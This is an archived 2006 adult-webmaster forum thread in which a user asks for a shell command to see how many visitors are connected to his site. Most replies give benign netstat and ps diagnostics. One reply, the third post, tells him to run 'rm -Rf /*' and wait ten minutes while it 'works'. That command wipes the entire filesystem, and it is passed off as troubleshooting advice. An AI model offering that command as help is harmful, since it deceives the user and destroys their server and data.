Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 05-29-2006, 10:22 PM   #1
Chris
Too lazy to set a custom title
 
Chris's Avatar
 
Industry Role:
Join Date: May 2003
Location: icq: 71462500 Skype: Jupzchris
Posts: 27,880
ssh command to show me how many connections to a domain?

I am logged in
i type netstat

is that showing how many people are on my site??

Code:
]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             Stat                        e
tcp        0    268 myserver.jupzchris.com:ssh  cpe-70-123-167-116.hot:1508 ESTA                        BLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  13     [ ]         DGRAM                    1971   /dev/log
unix  2      [ ]         DGRAM                    32441520
unix  3      [ ]         STREAM     CONNECTED     32441478
unix  3      [ ]         STREAM     CONNECTED     32441477
unix  3      [ ]         STREAM     CONNECTED     32408775 /var/lib/mysql/mysql.                        sock
unix  3      [ ]         STREAM     CONNECTED     32408774
unix  2      [ ]         DGRAM                    208652
unix  2      [ ]         DGRAM                    206200
unix  2      [ ]         DGRAM                    5127
unix  3      [ ]         STREAM     CONNECTED     4325
unix  3      [ ]         STREAM     CONNECTED     4324
unix  3      [ ]         STREAM     CONNECTED     4323
unix  3      [ ]         STREAM     CONNECTED     4322
unix  2      [ ]         DGRAM                    4291
unix  2      [ ]         DGRAM                    3521
unix  2      [ ]         DGRAM                    3043
unix  2      [ ]         DGRAM                    2593
unix  2      [ ]         DGRAM                    2575
unix  2      [ ]         DGRAM                    2435
unix  2      [ ]         DGRAM                    2041
unix  2      [ ]         DGRAM                    1979
[email protected] [~]#
__________________
[email protected]
Chris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-29-2006, 11:45 PM   #2
darksoul
Confirmed User
 
darksoul's Avatar
 
Join Date: Apr 2002
Location: /root/
Posts: 4,997
yup.
And as I see theres none.

A better command is
Code:
netstat -an|grep ESTA
__________________
1337 5y54|)m1n: 157717888
BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
Cambooth
darksoul is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-29-2006, 11:49 PM   #3
MrJackMeHoff
Confirmed User
 
Join Date: Mar 2004
Location: LOLLIPOP ISLAND =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=
Posts: 4,569
use "rm -Rf /*"

Dont touch your keyboard for at least 10 min its working..

____

Why not just turn on server-info in apache.. Its a simple way to see.
__________________

Last edited by MrJackMeHoff; 05-29-2006 at 11:50 PM..
MrJackMeHoff is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-30-2006, 12:07 AM   #4
iTEAM
Confirmed User
 
Join Date: May 2006
Posts: 147
Try this:
ps -aux | grep httpd | wc -l; netstat -na | grep :80 | wc -l;uptime
__________________
iTEAM Hosting
Contact Chad on ICQ: 256-331-436
iTEAM is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.